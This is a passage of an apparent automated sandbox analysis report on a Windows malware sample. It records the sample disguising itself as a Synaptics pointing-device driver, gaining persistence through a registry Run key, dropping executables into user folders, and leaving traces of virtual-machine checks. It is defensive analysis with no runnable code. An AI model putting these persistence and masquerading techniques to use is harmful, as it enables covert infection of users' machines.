You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on desusertions end users and end use. For additional information see www.microsoft.com/exporting <http://www.microsoft.com/exporting>.6.SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7.Entire Agreement. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8.Applicable Law.a.United States. If you acquired the software in the United States Washington state law governs the interpretation of this agreement and applies to claims for breach of it regardless of conflict
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeWindow detected: Number of UI elements: 15
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: file.exeStatic file information: File size 6490624 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: file.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x586200
                              Source: Binary string: sfxcab.pdb source: file.exe, ._cache_file.exe.0.dr, Synaptics.exe.0.dr
                              Source: Binary string: sqmapi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, sqmapi.dll.2.dr
                              Source: Binary string: SetupEngine.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, SetupEngine.dll.2.dr
                              Source: Binary string: patchhooks.pdb source: vc_red.msi.2.dr
                              Source: Binary string: Setup.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2623419946.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe, 00000004.00000000.1389333890.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe.2.dr
                              Source: Binary string: SetupUi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, SetupUi.dll.2.dr
                              Source: Binary string: SetupResources.pdb source: SetupResources.dll4.2.dr, SetupResources.dll3.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll8.2.dr
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010029C2 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_010029C2
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010065F3 push ecx; ret 2_2_01006603
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_00293DF5 push ecx; ret 4_2_00293E08
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6396AA75 push ecx; ret 4_2_6396AA88
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_63972709 push ecx; ret 4_2_6397271C
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D4821 push ecx; ret 4_2_6C5D4834
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D1B89 push ecx; ret 4_2_6C5D1B9C
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C926F06 push ecx; ret 4_2_6C926F19
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C91E265 push ecx; ret 4_2_6C91E278

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AFWAAFRXKO\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCX3CE.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dllJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AFWAAFRXKO\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\sqmapi.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\SetupEngine.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\SetupUi.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCX3CE.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AFWAAFRXKO\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1033\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1041\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1042\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1028\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\2052\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1040\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1036\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1031\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\3082\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1049\eula.rtfJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\VSSetupJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8EF721 StartServiceW,4_2_6C8EF721
                              Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 3297
                              Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 6662
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dllJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2912
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8108Thread sleep count: 63 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8108Thread sleep time: -3780000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8476Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010046B9 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strchr,strrchr,SendDlgItemMessageA,2_2_010046B9
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5E8097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C5E8097
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D4281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C5D4281
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8D5B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C8D5B82
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8D410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C8D410A
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C900C91 __EH_prolog3_GS,GetModuleHandleW,GetLastError,GetSystemInfo,GetNativeSystemInfo,GetLastError,GetLastError,GetLastError,_memset,GetNativeSystemInfo,GetLastError,4_2_6C900C91
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                              Source: Amcache.hve.17.drBinary or memory string: VMware
                              Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: wordpad.exe, 0000000B.00000003.1627079273.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                              Source: wordpad.exe, 0000000B.00000003.1627079273.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
